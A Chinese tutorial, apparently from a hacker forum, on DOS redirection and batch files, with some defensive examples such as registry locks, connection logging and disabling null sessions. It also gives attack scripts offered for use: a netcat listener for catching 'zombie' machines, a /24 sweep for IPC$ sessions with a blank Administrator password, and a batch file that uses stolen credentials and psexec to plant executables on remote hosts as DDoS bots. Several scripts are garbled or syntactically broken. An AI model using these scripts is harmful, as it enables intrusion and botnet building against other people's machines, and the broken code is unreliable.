二、DOS的重定向命令使用方法及其在安全方面的應用
DOS下有一個特殊的命令——重定向命令,非常有用,巧妙靈活運用可以給我們帶來很大的方便——無論是入侵還是防守,抑或是系統應用,都可以巧妙利用,下面是幾個重定向命令在安全方面的應用實例
▲1、命令格式
 
DOS的標準輸入輸出通常是在標準設備鍵盤和顯示器上進行的,利用重定向,可以方便地將輸入輸出改向磁盤文件或其它設備。其中:
 
(1)、大于號“>”將命令發送到文件或設備,例如打印機>prn。使用大于號“>”時,有些命令輸出(例如錯誤消息)不能重定向。
 
(2)、雙大于號“>>”將命令輸出添加到文件結尾而不刪除文件中已有的信息。
 
(3)、小于號“<”從文件而不是鍵盤上獲取命令所需的輸入。
 
(4)、>&符號將輸出從一個默認I/O流(stdout,stdin,stderr)重新定向到另一個默認I/O流。
 
例如,command >output_file 2>&1將處理command過程中的所有錯誤信息從屏幕重定向到標準文件輸出中。標準輸出的數值如下所示:
 
標準輸出 等價的數值
 
Stdin 0
Stdout 1
Stderr 2
 
其中,(1)和(2)都創建一個文件用于存放數據(4)可能不能夠在DOS下使用。
 
▲2、重定向命令的輸出
 
幾乎所有的命令均將輸出發送到屏幕。即使是將輸出發送到驅動器或打印機的命令,也會在屏幕上顯示消息和提示。要將輸出從屏幕重定向到文件或打印機,請使 用大于號(>)。大多數命令中均可以使用大于號。例如,在以下命令中,dir命令生成的目錄列表重定向到Dirlist.txt文件: dir>dirlist.txt,如果Dirlist.txt文件不存在,系統將創建該文件。如果Dirlist.txt存在,系統將使用dir命 令的輸出替換文件中的信息。
 
要將命令輸出添加到文件結尾而不丟失文件中的任何信息,請使用雙大于號(>>)。例如, 在以下命令中,dir命令生成的目錄列表附加到Dirlist.txt文件中:dir>dirlist.txt,將輸入重定向到一個命令,就象可以 將命令輸出發送到文件或打印機而不是屏幕一樣,您可以從文件而不是從鍵盤獲取命令的輸入。要從文件獲取輸入,請使用小于號(<)。例如,以下命令將 從List.txt文件中獲取sort命令的輸入:sort
 
▲3、應用舉例
 
①給注冊表加鎖/解鎖
 
大家知道,注冊表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\ Policies\System分支下的DWORD值“Disableregistrytools”的鍵值如為“1”,則可以給注冊表加鎖,這樣別人就無 法使用注冊表編輯器。利用重定向命令在DOS下就可以給注冊表加鎖/解鎖,非常方便。
 
打開記事本程序,新建一個文本文件,輸入如下內容:
 
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存為以.bat為擴展名的批處理文件,點擊這個文件注冊表就會被鎖定!
 
在上面的命令中,echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執行時本行在命令行或DOS里面不顯示,如果想看到程序執行過程, 請將“@”去掉。大家在編寫上述代碼時要注意的是,第一行中的“REGEDIT4”一定要用大寫字母,在第二行中“echo”和“.”之間沒有空格。 “>>”產生的內容將追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以無需確認就刪除123.reg文件。
 
要想給注冊表解鎖,可以編輯這個批處理文件,只需將 "DisableRegistryTools"=dword:00000001改為"DisableRegistryTools"=dword: 00000000,其他內容不變,保存為.bat文件,點擊就可以給注冊表解鎖了。
 
②把登陸3389的機器IP記錄下來
 
把下面的內容保存為3389IP.bat: 
time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer
運行3389IP.bat,然后查看log.log文件即可看到登陸3389的機器IP,是不是很方便呢?
 
③恢復DOS實模式
 
大家知道,某些惡意網頁會修改瀏覽者的注冊表,在無所不用其極的各種手段中,修改注冊表使DOS實模式不可用是其中的招數之一。要想恢復DOS實模式方法有很多,用批處理和重定向命令結合使用,是比較特別的一招,在此與大家分享。
 
echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg
另存為以.bat為擴展名的批處理文件,點擊這個文件就可以恢復DOS實模式,那些DOS應用程序又可以使用了。
 
④等待肉雞上門
 
每天費時費力的找肉雞是不是很辛苦,利用重定向命令和批處理文件就可以讓你簡單的找到肉雞!方法是用記事本新建一個文本文件,輸入如下內容:
 
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
保存為.bat文件(事先得準備好一個nc.exe文件,它是網絡故障事件檢測軟件Netcat的主程序),然后運行此程序之后,你就等著肉雞上門主動來找你吧!運氣好的話,每天10個不成問題。
 
⑤快速進行空連接
 
空連接是在沒有信任的情況下與服務器建立的會話,換句話說,它是一個到服務器的匿名訪問。使用命令net use \\IP\ipc""/user:""就可以簡單地和目標建立一個空連接(需要目標開放IPC)。利用重定向命令和for命令就可以對一個C類網段進行快速的空連接,并把結果保存到一個文件 中供你分析。方法是用記事本編輯如下內容的文件:
 
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc""/use:"Administrator"|find"命令完成">>test.txt
批處理文件保存為.bat,運行即可。這個批處理文件的功能是對你指定的一個C類網段中的254個ip依次試建立帳號為administrator口令為空的ipc連接,如果成功就把結果記錄在test.txt。這樣就實現了NT弱口令掃描功能!其中,for命令的功能是對一組文件中的每一個文件執行 某個特定命令,也就是可以用你指定的循環范圍生成一系列命令。For命令的格式為:FOR %variable IN (set) DO command [command-parameters],具體的含義:
 
%variable:指定一個單一字母可替換的參數。
 
(set):指定一個或一組文件。可以使用通配符。
 
command:指定對每個文件執行的命令。
 
command-parameters:為特定命令指定參數或命令行開關。
 
在批處理文件中使用FOR命令時,指定變量請使用%%variable而不要用%variable。變量名稱是區分大小寫的,所以%i不同%I。
 
⑥禁止空連接
 
空連接的存在對有一定的危險,所以我們還是禁止它為好!方法是輸入net share察看本地共享資源,接下來輸入如下命令刪除共享:
 
net share ipc/deletenetshareadmin /delete
 net share c/deletenetshared /delete(如果有e,f等盤符可以同法刪除)
 
然后用記事本新建一個文本文件,輸入如下內容即可:
 
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存為以.bat為擴展名的批處理文件,點擊這個文件就可以禁止空連接。
 
⑦掃描所有和本機以TCP協議連接的計算機
 
掃描自己的計算機端口,發現有特殊端口打開,可以查木馬,不僅如此,利用下面這個批處理文件還可以把所有和本機以TCP協議連接的計算機IP地址都記錄下來。這個.bat文件內容如下:
 
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
這樣不僅可以記錄下對方的IP,還有時間和日期,方便自己查看。
 
⑧自動獲取DDoS肉雞
 
DDoS是Distributed Denial of Service的縮寫,意即分布式拒絕服務攻擊。它是指借助于客戶/服務器技術,將多個計算機聯合起來作為攻擊平臺,對一個或多個目標發動DoS攻擊,從 而成倍地提高拒絕服務攻擊的威力。通常,攻擊者使用一個偷竊帳號將DDoS主控程序安裝在一個計算機上,在一個設定的時間主控程序將與大量代理程序通訊, 代理程序已經被安裝在Internet上的許多計算機上。代理程序收到指令時就發動攻擊。利用客戶/服務器技術,主控程序能在幾秒鐘內激活成百上千次代理 程序的運行。
 
雖然不建議大家使用DDoS方式攻擊,但作為技術掌握還是很有必要的。可是,如何才能獲取進行DDoS攻擊的肉雞呢?把下面的內容保存為ok.bat文件就可以達到目的了:
 
@echo off
echo自動獲取DDoS肉雞
for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc/user:"\sysytem32
if errorelevel 0 goto success
psexec -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$ /del
:success
echo >>success.txt
echo 肉雞:%i>>success.txt
echo 用戶名:%j>>success.txt
echo 密碼:%k>>success.txt
echo >>success.txt
使用方法是ok.bat *.exe host.txt,其中host.txt的格式為:ip administrator password。好了,快試試吧。但不要用來干破壞。
 
其實,本文所說的方法主要是利用了批處理和相關的命令,重定向命令在其中只是個紐帶,起連接作用,但也是不可忽視的,運用得好,能夠大大提高工作效率和方便性。